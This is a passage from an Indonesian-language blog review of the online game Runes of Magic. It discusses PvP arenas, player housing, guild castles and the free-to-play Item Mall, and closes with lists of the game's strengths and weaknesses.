Kemudian terdapat tempat khusus bagi pemain untuk mengadu kekuatan yaitu Arena. Di sini pemain dapat mendaftar untuk mengikuti pertandingan 1vs1 atau 3vs3, pemenangnya kaan mendapatkan Point yang dapat ditukar hadiah equipment level tinggi.
Selain itu, Runes of Magic juga menawarkan pilihan Server Full PvP dimana setiap pemain di dalam server tersebut dapat membunuh pemain lain kapan saja dimana saja.
Meskipun demikian, fitur PvP dalam Runes of Magic masih bisa dikatakan minim karena tidak adanya dua atau tiga bangsa yang saling bersetru, jika kamu merupakan pemain PvP hardcore mungkin akan merasa sedikit kecewa dengan game ini.

Personal House & Guild Castle
Bisa dikatakan fitur Housing dan Castle ini merupakan kelebihan Runes of Magic jika dibandingkan dengan World of Warcraft. Di sini kita tidak hanya bisa memiliki rumah pribadi sendiri, tetapi juga berikut perabotannya, hebatnya lagi perabotan tersebut bukan sekedar hiasan saja tetapi juga memiliki fungsi khusus sebagai pemberi bonus EXP jika kita beristirahat dan logout di dalam rumah. Namun sayang perabotan yang memiliki efek bonus tersebut hanya tersedia di Item Mall, sehingga tanpa bonus tersebut rasanya fitur perabotan tersebut tidak terlalu berguna, setidaknya diadakan perabotan dengan bonus yang bisa dibuat oleh pemain yang mengambil pekerjaan sebagai Carpenter.

Guild Castle juga memiliki fitur yang mirip dengan rumah pribadi namun mungkin dalam skala yang lebih besar, saya tidak bisa bercerita banyak karena sampai saat artikel ini ditulis guild saya belum berhasil membangun Castle... ha ha.

Item Mall
Seperti yang saya katakan di permulaan tadi, perlu dicatat bahwa Runes of Magic menjalankan cara yang sangat inovatif dalam menerapkan sistem Free-to-Play ini. Menggunakan dua mata uang yaitu Gold yang bisa didapatkan dari berburu monster ataupun menyelesaikan quest dan Diamond yang seharusnya hanya bisa didapatkan dengan membeli voucher, tetapi di dalam game ini juga bisa didapatkan dengan membelinya dari pemain lain untuk Gold melalui Auction House.
Selain itu Item Mall yang tersedia tidak semata-mata menjual barang-barang yang sangat dibutuhkan pemain hingga tidak mungkin untuk bermain tanpa membelinya dan hampir semua item (kecuali item khusus event) dalam Item Mall bisa didapatkan secara gratis atau menggunakan Gold meskipun dalam jumlah atau fitur yang dibatasi. Misalnya pemain bisa menambah jumlah penyimpanan tas dan bank jika merasa kurang, atau membeli tunggangan yang lebih cepat dan permanen menggunakan Diamond daripada terus menerus menyewa menggunakan Gold.

Meskipun tidak bisa dikatakan sempurna, tetapi implementasi Item Mall yang diterapkan oleh Runes of Magic bisa dikatakan lebih baik dan menarik jika dibandingkan game online Free-to-Play lain yang ada saat ini, khususnya genre MMORPG.

Keuntungan
1. Desain senjata dan armor lebih detil dan bisa dimainkan pada spesifikasi komputer yang lebih rendah.
2. Kualitas efek suara dan musik latar belakang dalam Runes of Magic sudah cukup baik, tidak terlalu membosankan, namun tentu saja ini tergantung selera masing-masing pemain.
3. Kumpulan skill ini memiliki kemampuan yang unik yang tidak akan dimiliki oleh kombinasi dual class lain
4. Duel dapat dilakukan oleh dua karakter pemain yang tidak berbeda level terlalu jauh, pemain yang berhasil menurunkan HP lawan sampai dengan 1% dianggap pemenangnya
5. fitur Housing dan Castle ini kita tidak hanya bisa memiliki rumah pribadi sendiri, tetapi juga berikut perabotannya, hebatnya lagi perabotan tersebut bukan sekedar hiasan saja tetapi juga memiliki fungsi khusus sebagai pemberi bonus EXP jika kita beristirahat dan logout di dalam rumah.
6. Menggunakan dua mata uang yaitu Gold yang bisa didapatkan dari berburu monster ataupun menyelesaikan quest dan Diamond yang seharusnya hanya bisa didapatkan dengan membeli voucher, tetapi di dalam game ini juga bisa didapatkan dengan membelinya dari pemain lain untuk Gold melalui Auction House.

Kekurangan
1. Pembuatan karakter dalam Runes of Magic cukup standar
2. Meskipun demikian, fitur PvP dalam Runes of Magic masih bisa dikatakan minim karena tidak adanya dua atau tiga bangsa yang saling bersetru, jika kamu merupakan pemain PvP hardcore mungkin akan merasa sedikit kecewa dengan game ini.
3. perabotan yang memiliki efek bonus tersebut hanya tersedia di Item Mall, sehingga tanpa bonus tersebut rasanya fitur perabotan tersebut tidak terlalu berguna, setidaknya diadakan perabotan dengan bonus yang bisa dibuat oleh pemain yang mengambil pekerjaan sebagai Carpenter
 
Copyright © 2010 iiapieblog | Design : Noyod.Com